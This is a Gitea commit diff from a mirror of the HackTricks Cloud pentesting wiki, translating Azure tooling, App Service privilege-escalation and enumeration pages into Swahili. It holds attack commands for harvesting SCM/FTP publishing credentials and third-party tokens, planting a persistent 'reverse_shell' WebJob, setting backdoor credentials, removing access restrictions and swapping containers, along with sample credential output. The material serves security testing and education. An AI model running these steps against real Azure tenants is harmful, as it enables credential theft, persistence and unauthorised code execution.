gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-01-10 20:23:28 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-enumeration-tools.md

Browse Source
This commit is contained in:
Translator
2025-01-03 19:25:30 +00:00
parent 2334e62399
commit b59c4346a0
3 changed files with 405 additions and 92 deletions
Download Patch File Download Diff File Expand all files Collapse all files

50
src/pentesting-cloud/azure-security/az-enumeration-tools.md
View File

@@ -2,35 +2,33 @@
{{#include ../../banners/hacktricks-training.md}}
## Install PowerShell in Linux
## Sakinisha PowerShell katika Linux
> [!TIP]
> Katika linux utahitaji kufunga PowerShell Core:
>
> ```bash
> sudo apt-get update
> sudo apt-get install -y wget apt-transport-https software-properties-common
>
> # Ubuntu 20.04
> wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb
>
> # Update repos
> sudo apt-get update
> sudo add-apt-repository universe
>
> # Install & start powershell
> sudo apt-get install -y powershell
> pwsh
>
> # Az cli
> curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
> ```
> Katika linux utahitaji kusakinisha PowerShell Core:
```bash
sudo apt-get update
sudo apt-get install -y wget apt-transport-https software-properties-common
## Install PowerShell in MacOS
# Ubuntu 20.04
wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb
Maelekezo kutoka kwa [**documentation**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
# Update repos
sudo apt-get update
sudo add-apt-repository universe
1. Install `brew` ikiwa haijafungwa bado:
# Install & start powershell
sudo apt-get install -y powershell
pwsh
# Az cli
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
```
## Sakinisha PowerShell katika MacOS
Maelekezo kutoka kwa [**nyaraka**](https://learn.microsoft.com/en-us/powershell/scripting/install/installing-powershell-on-macos?view=powershell-7.4):
1. Sakinisha `brew` ikiwa bado haijasakinishwa:
```bash
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
```
@@ -63,7 +61,7 @@ Kwa kutumia parameter **`--debug`** inawezekana kuona maombi yote ambayo chombo
```bash
az account management-group list --output table --debug
```
Ili kufanya **MitM** kwa zana na **kuangalia maombi yote** inayopeleka kwa mikono unaweza kufanya:
Ili kufanya **MitM** kwa chombo na **kuangalia maombi yote** yanayotumwa kwa mikono unaweza kufanya:
{{#tabs }}
{{#tab name="Bash" }}
@@ -109,7 +107,7 @@ Ili kufanya **MitM** kwa zana na **kuangalia maombi yote** inayopeleka kwa mikon
### Microsoft Graph PowerShell
Microsoft Graph PowerShell ni SDK ya kuvuka majukwaa inayowezesha ufikiaji wa APIs zote za Microsoft Graph, ikiwa ni pamoja na huduma kama SharePoint, Exchange, na Outlook, kwa kutumia kiunganishi kimoja. Inasaidia PowerShell 7+, uthibitishaji wa kisasa kupitia MSAL, identiti za nje, na maswali ya hali ya juu. Kwa kuzingatia ufikiaji wa chini wa ruhusa, inahakikisha shughuli salama na inapokea masasisho ya kawaida ili kuendana na vipengele vya hivi karibuni vya Microsoft Graph API.
Microsoft Graph PowerShell ni SDK ya kuvuka majukwaa inayowezesha ufikiaji wa APIs zote za Microsoft Graph, ikiwa ni pamoja na huduma kama SharePoint, Exchange, na Outlook, kwa kutumia kiunganishi kimoja. Inasaidia PowerShell 7+, uthibitishaji wa kisasa kupitia MSAL, identiti za nje, na maswali ya hali ya juu. Kwa kuzingatia ufikiaji wa chini wa ruhusa, inahakikisha shughuli salama na inapokea masasisho ya mara kwa mara ili kuendana na vipengele vya hivi karibuni vya Microsoft Graph API.
Fuata kiungo hiki kwa [**maelekezo ya usakinishaji**](https://learn.microsoft.com/en-us/powershell/microsoftgraph/installation).

253
src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md
View File

@@ -10,16 +10,16 @@ Kwa maelezo zaidi kuhusu Azure App services angalia:
../az-services/az-app-service.md
{{#endref}}
### Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read, 
### Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read
Ruhusa hizi zinaruhusu kuita amri zifuatazo kupata **SSH shell** ndani ya programu ya wavuti
Ruhusa hizi zinaruhusu kupata **SSH shell** ndani ya programu ya wavuti. Pia zinaruhusu **debug** programu hiyo.
- Chaguo la moja kwa moja:
- **SSH katika amri moja**:
```bash
# Direct option
az webapp ssh --name <name> --resource-group <res-group>
```
- Unda tunnel kisha unganisha na SSH:
- **Unda tunnel kisha unganisha na SSH**:
```bash
az webapp create-remote-connection --name <name> --resource-group <res-group>
@@ -32,4 +32,249 @@ az webapp create-remote-connection --name <name> --resource-group <res-group>
## So from that machine ssh into that port (you might need generate a new ssh session to the jump host)
ssh root@127.0.0.1 -p 39895
```
- **Debug the application**:
1. Sakinisha nyongeza ya Azure katika VScode.
2. Ingia kwenye nyongeza kwa kutumia akaunti ya Azure.
3. Orodhesha huduma zote za App ndani ya usajili.
4. Chagua huduma ya App unayotaka kudhibiti, bonyeza kulia na uchague "Start Debugging".
5. Ikiwa programu haina udhibiti ulioanzishwa, nyongeza itajaribu kuanzisha lakini akaunti yako inahitaji ruhusa `Microsoft.Web/sites/config/write` kufanya hivyo.
### Obtaining SCM Credentials & Enabling Basic Authentication
Ili kupata akreditivu za SCM, unaweza kutumia **amri na ruhusa** zifuatazo:
- Ruhusa **`Microsoft.Web/sites/publishxml/action`** inaruhusu kuita:
```bash
az webapp deployment list-publishing-profiles --name <app-name> --resource-group <res-group>
# Example output
[
{
"SQLServerDBConnectionString": "",
"controlPanelLink": "https://portal.azure.com",
"databases": null,
"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
"hostingProviderForumLink": "",
"msdeploySite": "happy-bay-0d8f842ef57843c89185d452c1cede2a",
"mySQLDBConnectionString": "",
"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - Web Deploy",
"publishMethod": "MSDeploy",
"publishUrl": "happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net:443",
"userName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"webSystem": "WebSites"
},
{
"SQLServerDBConnectionString": "",
"controlPanelLink": "https://portal.azure.com",
"databases": null,
"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
"ftpPassiveMode": "True",
"hostingProviderForumLink": "",
"mySQLDBConnectionString": "",
"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - FTP",
"publishMethod": "FTP",
"publishUrl": "ftps://waws-prod-yt1-067.ftp.azurewebsites.windows.net/site/wwwroot",
"userName": "happy-bay-0d8f842ef57843c89185d452c1cede2a\\$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"webSystem": "WebSites"
},
{
"SQLServerDBConnectionString": "",
"controlPanelLink": "https://portal.azure.com",
"databases": null,
"destinationAppUrl": "https://happy-bay-0d8f842ef57843c89185d452c1cede2a.azurewebsites.net",
"hostingProviderForumLink": "",
"mySQLDBConnectionString": "",
"profileName": "happy-bay-0d8f842ef57843c89185d452c1cede2a - Zip Deploy",
"publishMethod": "ZipDeploy",
"publishUrl": "happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net:443",
"userName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"userPWD": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"webSystem": "WebSites"
}
]
```
Kumbuka jinsi **jina la mtumiaji daima ni sawa** (isipokuwa katika FTP ambayo inaongeza jina la programu mwanzoni) lakini **nenosiri ni sawa** kwa wote.
Zaidi ya hayo, **SCM URL ni `<app-name>.scm.azurewebsites.net`**.
- Ruhusa **`Microsoft.Web/sites/config/list/action`** inaruhusu kuita:
```bash
az webapp deployment list-publishing-credentials --name <app-name> --resource-group <res-group>
# Example output
{
"id": "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/carlos_rg_3170/providers/Microsoft.Web/sites/happy-bay-0d8f842ef57843c89185d452c1cede2a/publishingcredentials/$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"kind": null,
"location": "Canada Central",
"name": "happy-bay-0d8f842ef57843c89185d452c1cede2a",
"publishingPassword": "bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS",
"publishingPasswordHash": null,
"publishingPasswordHashSalt": null,
"publishingUserName": "$happy-bay-0d8f842ef57843c89185d452c1cede2a",
"resourceGroup": "carlos_rg_3170",
"scmUri": "https://$happy-bay-0d8f842ef57843c89185d452c1cede2a:bgrMliuJayY5btkKl9vRNuit7HEqXfnL9w7iv5l2Gh2Q2mAyCdCS1LPfi3zS@happy-bay-0d8f842ef57843c89185d452c1cede2a.scm.azurewebsites.net",
"type": "Microsoft.Web/sites/publishingcredentials"
}
```
Kumbuka jinsi **akili ni sawa** na katika amri ya awali.
- Chaguo lingine lingekuwa **kweka akili zako mwenyewe** na kuzitumia:
```bash
az webapp deployment user set \
--user-name hacktricks \
--password 'W34kP@ssw0rd123!'
```
Kisha, unaweza kutumia hizi credentials **kupata kwenye jukwaa la SCM na FTP**. Hii pia ni njia nzuri ya kudumisha uvumilivu.
Kumbuka kwamba ili kupata jukwaa la SCM kutoka **mtandao unahitaji kufikia `<SCM-URL>/BasicAuth`**.
> [!WARNING]
> Kumbuka kwamba kila mtumiaji anaweza kuunda credentials zake mwenyewe kwa kuita amri ya awali, lakini ikiwa mtumiaji hana ruhusa za kutosha kupata SCM au FTP, credentials hazitafanya kazi.
- Ikiwa unaona kwamba hizo credentials zime **REDACTED**, ni kwa sababu unahitaji **kuwezesha chaguo la uthibitishaji wa msingi wa SCM** na kwa hiyo unahitaji ruhusa ya pili (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):`
```bash
# Enable basic authentication for SCM
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}'
# Enable basic authentication for FTP
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \
--body '{
"properties": {
"allow": true
}
}
```
### Chapisha msimbo kwa kutumia akreditivu za SCM
Kuwa na akreditivu halali za SCM kunawezesha **chapisha msimbo** kwenye huduma ya App. Hii inaweza kufanywa kwa kutumia amri ifuatayo.
Kwa mfano huu wa python unaweza kupakua repo kutoka https://github.com/Azure-Samples/msdocs-python-flask-webapp-quickstart, fanya **mabadiliko** yoyote unayotaka na kisha **zip kwa kukimbia: `zip -r app.zip .`**.
Kisha unaweza **chapisha msimbo** kwa kutumia amri ifuatayo:
```bash
curl -X POST "<SMC-URL>/api/publish?type=zip" --data-binary "@./app.zip" -u '<username>:<password>' -H "Content-Type: application/octet-stream"
```
### Microsoft.Web/sites/publish/Action | SCM credentials
Ruhusa iliyoelezwa ya Azure inaruhusu kufanya vitendo kadhaa vya kuvutia ambavyo vinaweza pia kufanywa kwa kutumia SCM credentials:
- Soma **Webjobs** logs:
```bash
# Using Azure credentials
az rest --method GET --url "<SCM-URL>/vfs/data/jobs/<continuous | triggered>/rev5/job_log.txt" --resource "https://management.azure.com/"
az rest --method GET --url "https://lol-b5fyaeceh4e9dce0.scm.canadacentral-01.azurewebsites.net/vfs/data/jobs/continuous/rev5/job_log.txt" --resource "https://management.azure.com/"
# Using SCM username and password:
curl "<SCM-URL>/vfs/data/jobs/continuous/job_name/job_log.txt" \
--user '<username>:<password>>' -v
```
- Soma **Webjobs** msimbo wa chanzo:
```bash
# Using SCM username and password:
# Find all the webjobs inside:
curl "<SCM-URL>/wwwroot/App_Data/jobs/" \
--user '<username>:<password>'
# e.g.
curl "https://nodewebapp-agamcvhgg3gkd3hs.scm.canadacentral-01.azurewebsites.net/wwwroot/App_Data/jobs/continuous/job_name/rev.js" \
--user '<username>:<password>'
```
- Unda **Webjob isiyokatizwa**:
```bash
# Using Azure permissions
az rest \
--method put \
--uri "https://windowsapptesting-ckbrg3f0hyc8fkgp.scm.canadacentral-01.azurewebsites.net/api/Continuouswebjobs/reverse_shell" \
--headers '{"Content-Disposition": "attachment; filename=\"rev.js\""}' \
--body "@/Users/username/Downloads/rev.js" \
--resource "https://management.azure.com/"
# Using SCM credentials
curl -X PUT \
"<SCM-URL>/api/Continuouswebjobs/reverse_shell2" \
-H 'Content-Disposition: attachment; filename=rev.js' \
--data-binary "@/Users/carlospolop/Downloads/rev.js" \
--user '<username>:<password>'
```
### Microsoft.Web/sites/config/list/action
Ruhusa hii inaruhusu kuorodhesha **connection strings** na **appsettings** za huduma ya App ambazo zinaweza kuwa na taarifa nyeti kama vile akidi za database.
```bash
az webapp config connection-string list --name <name> --resource-group <res-group>
az webapp config appsettings list --name <name> --resource-group <res-group>
```
### Microsoft.Web/sites/write, Microsoft.Web/sites/read, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action
Hizi ruhusa zinaruhusu **kuteua utambulisho wa kusimamiwa** kwa huduma ya App, hivyo ikiwa huduma ya App ilishambuliwa hapo awali hii itamruhusu mshambuliaji kuteua utambulisho mpya wa kusimamiwa kwa huduma ya App na **kuinua mamlaka** kwao.
```bash
az webapp identity assign --name <app-name> --resource-group <res-group> --identities /subscriptions/<subcripttion-id>/resourceGroups/<res_group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>
```
### Soma Akikodi za Watu wa Tatu Zilizowekwa
Kukimbia amri ifuatayo inawezekana **kusoma akidi za watu wa tatu** zilizowekwa katika akaunti ya sasa. Kumbuka kwamba ikiwa kwa mfano akidi za Github zimewekwa kwa mtumiaji tofauti, huwezi kupata token kutoka kwa mwingine.
```bash
az rest --method GET \
--url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
```
Amri hii inarudisha tokeni za Github, Bitbucket, Dropbox na OneDrive.
Hapa kuna mifano ya amri za kuangalia tokeni:
```bash
# GitHub List Repositories
curl -H "Authorization: token <token>" \
-H "Accept: application/vnd.github.v3+json" \
https://api.github.com/user/repos
# Bitbucket List Repositories
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://api.bitbucket.org/2.0/repositories
# Dropbox List Files in Root Folder
curl -X POST https://api.dropboxapi.com/2/files/list_folder \
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
--data '{"path": ""}'
# OneDrive List Files in Root Folder
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://graph.microsoft.com/v1.0/me/drive/root/children
```
### Update App Code from the source
- Ikiwa chanzo kilichowekwa ni mtoa huduma wa tatu kama Github, BitBucket au Azure Repository, unaweza **kusaidia kuimarisha msimbo** wa huduma ya App kwa kuingilia msimbo wa chanzo katika hifadhi.
- Ikiwa programu imewekwa kutumia **hifadhi ya git ya mbali** (ikiwa na jina la mtumiaji na nenosiri), inawezekana kupata **URL na akreditif za msingi za uthibitishaji** ili kunakili na kusukuma mabadiliko kwa:
- Kutumia ruhusa **`Microsoft.Web/sites/sourcecontrols/read`**: `az webapp deployment source show --name <app-name> --resource-group <res-group>`
- Kutumia ruhusa **`Microsoft.Web/sites/config/list/action`**:
- `az webapp deployment list-publishing-credentials --name <app-name> --resource-group <res-group>`
- `az rest --method POST --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/metadata/list?api-version=2022-03-01" --resource "https://management.azure.com"`
- Ikiwa programu imewekwa kutumia **hifadhi ya git ya ndani**, inawezekana **kunakili hifadhi** na **kusukuma mabadiliko** ndani yake:
- Kutumia ruhusa **`Microsoft.Web/sites/sourcecontrols/read`**: Unaweza kupata URL ya hifadhi ya git kwa `az webapp deployment source show --name <app-name> --resource-group <res-group>`, lakini itakuwa sawa na URL ya SCM ya programu yenye njia `/<app-name>.git` (kwa mfano, `https://pythonwebapp-audeh9f5fzeyhhed.scm.canadacentral-01.azurewebsites.net:443/pythonwebapp.git`).
- Ili kupata akreditif za SCM unahitaji ruhusa:
- **`Microsoft.Web/sites/publishxml/action`**: Kisha endesha `az webapp deployment list-publishing-profiles --resource-group <res-group> -n <name>`.
- **`Microsoft.Web/sites/config/list/action`**: Kisha endesha `az webapp deployment list-publishing-credentials --name <name> --resource-group <res-group>`
> [!WARNING]
> Kumbuka kwamba kuwa na ruhusa `Microsoft.Web/sites/config/list/action` na akreditif za SCM daima inawezekana kupeleka kwenye webapp (hata kama ilipangwa kutumia mtoa huduma wa tatu) kama ilivyotajwa katika sehemu ya awali.
> [!WARNING]
> Kumbuka kwamba kuwa na ruhusa zilizo hapa chini pia ni **uwezekano wa kutekeleza kontena chochote** hata kama webapp ilipangwa tofauti.
### `Microsoft.Web/sites/config/Write`, `Microsoft.Web/sites/config/Read`, `Microsoft.Web/sites/config/list/Action`, `Microsoft.Web/sites/Read`
Hii ni seti ya ruhusa inayoruhusu **kubadilisha kontena kinachotumika** na webapp. Mshambuliaji anaweza kuitumia vibaya kufanya webapp itekeleze kontena chenye uharibifu.
```bash
az webapp config container set \
--name <app-name> \
--resource-group <res-group> \
--docker-custom-image-name mcr.microsoft.com/appsvc/staticsite:latest
```
{{#include ../../../banners/hacktricks-training.md}}

194
src/pentesting-cloud/azure-security/az-services/az-app-service.md
View File

@@ -4,34 +4,85 @@
## App Service Basic Information
Azure App Services inaruhusu waendelezaji **kuunda, kupeleka, na kupanua programu za wavuti, nyuma za programu za rununu, na APIs bila shida**. Inasaidia lugha nyingi za programu na inajumuisha zana na huduma mbalimbali za Azure kwa ajili ya kuboresha kazi na usimamizi.
Azure App Services inaruhusu waendelezaji **kuunda, kupeleka, na kupanua programu za wavuti, nyuma ya programu za simu, na APIs bila shida**. Inasaidia lugha nyingi za programu na inajumuisha zana na huduma mbalimbali za Azure kwa ajili ya kuboresha kazi na usimamizi.
Kila programu inafanya kazi ndani ya sandbox lakini kutengwa kunategemea mipango ya App Service
- Programu katika ngazi za Bure na Kushiriki zinafanya kazi kwenye VMs za pamoja
- Programu katika ngazi za Kawaida na Premium zinafanya kazi kwenye VMs maalum
- Programu katika ngazi za Bure na Kushiriki zinafanya kazi kwenye VMs zinazoshirikiwa
- Programu katika ngazi za Kawaida na Kitaalamu zinafanya kazi kwenye VMs zilizotengwa
> [!WARNING]
> Kumbuka kwamba **hakuna** ya kutengwa hizo **zinazuia** udhaifu mwingine wa kawaida wa **wavuti** (kama vile kupakia faili, au sindano). Na ikiwa **utambulisho wa usimamizi** unatumika, inaweza kuwa na uwezo wa **kuinua mamlaka kwao**.
> Kumbuka kwamba **hakuna** ya kutengwa hizo **inaepusha** udhaifu mwingine wa kawaida wa **wavuti** (kama vile kupakia faili, au sindano). Na ikiwa **utambulisho wa usimamizi** unatumika, inaweza kuwa na uwezo wa **kuinua mamlaka kwao**.
### Azure Function Apps
Programu zina mipangilio ya kuvutia:
Kimsingi **Azure Function apps ni sehemu ya Azure App Service** katika wavuti na ikiwa utaenda kwenye console ya wavuti na orodheshe huduma zote za programu au tekeleza `az webapp list` katika az cli utaweza **kuona Function apps pia zikiwa orodheshwa hapa**.
Kwa kweli baadhi ya **vipengele vinavyohusiana na usalama** ambavyo huduma za programu zinatumia (`webapp` katika az cli), **pia vinatumika na Function apps**.
- **Daima Iko**: Inahakikisha kwamba programu inafanya kazi kila wakati. Ikiwa haijawashwa, programu itasimama kufanya kazi baada ya dakika 20 za kutokuwa na shughuli na itaanza tena wakati ombi litakapopokelewa.
- Hii ni muhimu ikiwa una kazi ya wavuti inayohitaji kufanya kazi bila kukatika kwani kazi ya wavuti itasimama ikiwa programu itasimama.
- **SSH**: Ikiwa imewashwa, mtumiaji mwenye ruhusa ya kutosha anaweza kuungana na programu kwa kutumia SSH.
- **Kusafisha**: Ikiwa imewashwa, mtumiaji mwenye ruhusa ya kutosha anaweza kusafisha programu. Hata hivyo, hii inazuiliwa kiotomatiki kila masaa 48.
- **Programu ya Wavuti + Hifadhidata**: Kihifadhi cha wavuti kinaruhusu kuunda Programu yenye hifadhidata. Katika kesi hii inawezekana kuchagua hifadhidata ya kutumia (SQLAzure, PostgreSQL, MySQL, MongoDB) na pia inaruhusu kuunda Cache ya Azure kwa Redis.
- URL inayoshikilia taarifa za kuingia kwa hifadhidata na Redis itahifadhiwa katika **appsettings**.
- **Konteina**: Inawezekana kupeleka konteina kwa App Service kwa kuashiria URL ya konteina na taarifa za kuingia ili kuweza kuipata.
## Basic Authentication
Unapounda programu ya wavuti (na kazi ya Azure kwa kawaida) inawezekana kuashiria ikiwa unataka Uthibitishaji wa Msingi uwekwe. Hii kimsingi **inawezesha SCM na FTP** kwa ajili ya programu ili iwezekane kupeleka programu kwa kutumia teknolojia hizo.\
Wakati wa kuunda programu ya wavuti (na kazi ya Azure kwa kawaida) inawezekana kuashiria ikiwa unataka Uthibitishaji wa Msingi uwe umewashwa. Hii kimsingi **inawezesha SCM na FTP** kwa programu ili iwezekane kupeleka programu kwa kutumia teknolojia hizo.\
Zaidi ya hayo ili kuungana nazo, Azure inatoa **API inayoruhusu kupata jina la mtumiaji, nenosiri na URL** ya kuungana na seva za SCM na FTP.
- Uthibitishaji: az webapp auth show --name lol --resource-group lol_group
Inawezekana kuungana na SCM kwa kutumia kivinjari cha wavuti katika `https://<SMC-URL>/BasicAuth` na kuangalia faili zote na upelelezi huko.
SSH
### Kudu
Daima On
Kudu ni **injini ya upelelezi na jukwaa la usimamizi kwa Azure App Service na Function Apps**, ikitoa upelelezi wa msingi wa Git, kusafisha kwa mbali, na uwezo wa usimamizi wa faili kwa programu za wavuti. Inapatikana kupitia URL ya SCM ya programu ya wavuti.
Kumbuka kwamba toleo la Kudu linalotumiwa na App Services na na Function Apps ni tofauti, toleo la Function apps likiwa na mipaka zaidi.
Baadhi ya maeneo ya kuvutia unaweza kuyapata katika Kudu ni:
- `/DebugConsole`: Kihifadhi kinachokuruhusu kutekeleza amri katika mazingira ambapo Kudu inafanya kazi.
- Kumbuka kwamba mazingira haya **hayana ufikiaji** wa huduma ya metadata ili kupata tokens.
- `/webssh/host`: Mteja wa SSH wa wavuti unaokuruhusu kuungana ndani ya konteina ambapo programu inafanya kazi.
- Hali hii **ina ufikiaji wa huduma ya metadata** ili kupata tokens kutoka kwa utambulisho wa usimamizi uliotolewa.
- `/Env`: Pata taarifa kuhusu mfumo, mipangilio ya programu, mabadiliko ya mazingira, nyuzi za muunganisho na vichwa vya HTTP.
- `/wwwroot/`: Katalogi ya mzizi ya programu ya wavuti. Unaweza kupakua faili zote kutoka hapa.
## Sources
App Services inaruhusu kupakia msimbo kama faili ya zip kwa default, lakini pia inaruhusu kuungana na huduma ya mtu wa tatu na kupata msimbo kutoka huko.
- Vyanzo vya mtu wa tatu vinavyoungwa mkono kwa sasa ni **Github** na **Bitbucket**.
- Unaweza kupata tokens za uthibitishaji kwa kukimbia `az rest --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"`
- Azure kwa default itaunda **Github Action** ili kupeleka msimbo kwa App Service kila wakati msimbo unaposasishwa.
- Pia inawezekana kuashiria **hifadhi ya git ya mbali** (ikiwa na jina la mtumiaji na nenosiri) ili kupata msimbo kutoka huko.
- Unaweza kupata taarifa za kuingia kwa hifadhi ya mbali kwa kukimbia `az webapp deployment source show --name <app-name> --resource-group <res-group>` au `az rest --method POST --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/config/metadata/list?api-version=2022-03-01" --resource "https://management.azure.com"`
- Pia inawezekana kutumia **Azure Repository**.
- Pia inawezekana kuunda **hifadhi ya git ya ndani**.
- Unaweza kupata URL ya hifadhi ya git kwa `az webapp deployment source show --name <app-name> --resource-group <res-group>` na itakuwa URL ya SCM ya programu.
- Ili kuikopi unahitaji taarifa za kuingia za SCM ambazo unaweza kupata kwa `az webapp deployment list-publishing-profiles --resource-group <res-group> -n <name>`
## Webjobs
Azure WebJobs ni **kazi za nyuma zinazofanya kazi katika mazingira ya Azure App Service**. Zinawaruhusu waendelezaji kutekeleza skripti au programu pamoja na programu zao za wavuti, na kufanya iwe rahisi kushughulikia shughuli zisizo za kawaida au zinazohitaji muda kama vile usindikaji wa faili, usimamizi wa data, au kazi za ratiba.
Kuna aina 2 za kazi za wavuti:
- **Kudumu**: Inafanya kazi bila kikomo katika mzunguko na inasababishwa mara tu inapotengenezwa. Ni bora kwa kazi zinazohitaji usindikaji wa mara kwa mara. Hata hivyo, ikiwa programu itasimama kufanya kazi kwa sababu Daima Iko haijawashwa na haijapokea ombi katika dakika 20 zilizopita, kazi ya wavuti pia itasimama.
- **Iliyosababishwa**: Inafanya kazi kwa ombi au kulingana na ratiba. Inafaa zaidi kwa kazi za mara kwa mara, kama vile masasisho ya data ya kundi au taratibu za matengenezo.
Webjobs ni za kuvutia sana kutoka kwa mtazamo wa washambuliaji kwani zinaweza kutumika **kutekeleza msimbo** katika mazingira na **kuinua mamlaka** kwa utambulisho wa usimamizi uliounganishwa.
Zaidi ya hayo, kila wakati ni ya kuvutia kuangalia **kumbukumbu** zinazozalishwa na Webjobs kwani zinaweza kuwa na **taarifa nyeti**.
### Slots
Azure App Service Slots zinatumika **kupeleka toleo tofauti la programu** kwa App Service moja. Hii inaruhusu waendelezaji kujaribu vipengele au mabadiliko mapya katika mazingira tofauti kabla ya kupeleka kwenye mazingira ya uzalishaji.
Zaidi ya hayo, inawezekana kuelekeza **asilimia ya trafiki** kwa slot maalum, ambayo ni muhimu kwa **A/B testing**, na kwa madhumuni ya nyuma ya mlango.
### Azure Function Apps
Kimsingi **Azure Function apps ni sehemu ya Azure App Service** katika wavuti na ikiwa utaenda kwenye kihifadhi cha wavuti na kuorodhesha huduma zote za programu au kutekeleza `az webapp list` katika az cli utaweza **kuona Function apps pia zimeorodheshwa hapa**.
Kwa kweli baadhi ya **vipengele vinavyohusiana na usalama** App services hutumia (`webapp` katika az cli), pia **vinatumika na Function apps**.
Kukarabati
### Enumeration
@@ -40,9 +91,10 @@ Kukarabati
```bash
# List webapps
az webapp list
## Less information
az webapp list --query "[].{hostName: defaultHostName, state: state, name: name, resourcegroup: resourceGroup}"
az webapp list --query "[].{hostName: defaultHostName, state: state, name: name, resourcegroup: resourceGroup}" -o table
## Get SCM URL of each webapp
az webapp list | grep '"name"' | grep "\.scm\." | awk '{print $2}' | sed 's/"//g'
# Get info about 1 app
az webapp show --name <name> --resource-group <res-group>
@@ -51,18 +103,24 @@ az webapp show --name <name> --resource-group <res-group>
az webapp list-instances --name <name> --resource-group <res-group>
## If you have enough perm you can go to the "consoleUrl" and access a shell inside the instance form the web
# Get configured Auth information
az webapp auth show --name <app-name> --resource-group <res-group>
# Get access restrictions of an app
az webapp config access-restriction show --name <name> --resource-group <res-group>
# Remove access restrictions
az webapp config access-restriction remove --resource-group <res-group> -n <name> --rule-name <rule-name>
# Get connection strings of a webapp
az webapp config connection-string list --name <name> --resource-group <res-group>
# Get appsettings of an app
az webapp config appsettings list --name <name> --resource-group <res-group>
# Get SCM and FTP credentials
az webapp deployment list-publishing-profiles --name <name> --resource-group <res-group>
# Get configured Auth information
az webapp auth show --name <app-name> --resource-group <res-group>
# Get backups of a webapp
az webapp config backup list --webapp-name <name> --resource-group <res-group>
@@ -75,61 +133,39 @@ az webapp config snapshot list --resource-group <res-group> -n <name>
# Restore snapshot
az webapp config snapshot restore -g <res-group> -n <name> --time 2018-12-11T23:34:16.8388367
# Get connection strings of a webapp
az webapp config connection-string list --name <name> --resource-group <res-group>
# Get slots
az webapp deployment slot list --name <AppName> --resource-group <ResourceGroupName> --output table
az webapp show --slot <SlotName> --name <AppName> --resource-group <ResourceGroupName>
# Get traffic-routing
az webapp traffic-routing show --name <AppName> --resource-group <ResourceGroupName>
# Get used container by the app
az webapp config container show --name <name> --resource-group <res-group>
# Get storage account configurations of a webapp
az webapp config storage-account list --name <name> --resource-gl_group
az webapp config storage-account list --name <name> --resource-group <res-group>
# Get configured container (if any) in the webapp, it could contain credentials
az webapp config container show --name <name> --resource-group <res-group>
# Get Webjobs
az webapp webjob continuous list --resource-group <res-group> --name <app-name>
az webapp webjob triggered list --resource-group <res-group> --name <app-name>
# Read webjobs logs with Azure permissions
az rest --method GET --url "<SCM-URL>/vfs/data/jobs/<continuous | triggered>/rev5/job_log.txt" --resource "https://management.azure.com/"
az rest --method GET --url "https://lol-b5fyaeceh4e9dce0.scm.canadacentral-01.azurewebsites.net/vfs/data/jobs/continuous/rev5/job_log.txt" --resource "https://management.azure.com/"
# List all the functions
az functionapp list
# Read webjobs logs with SCM credentials
curl "https://windowsapptesting-ckbrg3f0hyc8fkgp.scm.canadacentral-01.azurewebsites.net/vfs/data/jobs/continuous/lala/job_log.txt" \
--user '<username>:<password>' -v
# Get info of 1 funciton (although in the list you already get this info)
az functionapp show --name <app-name> --resource-group <res-group>
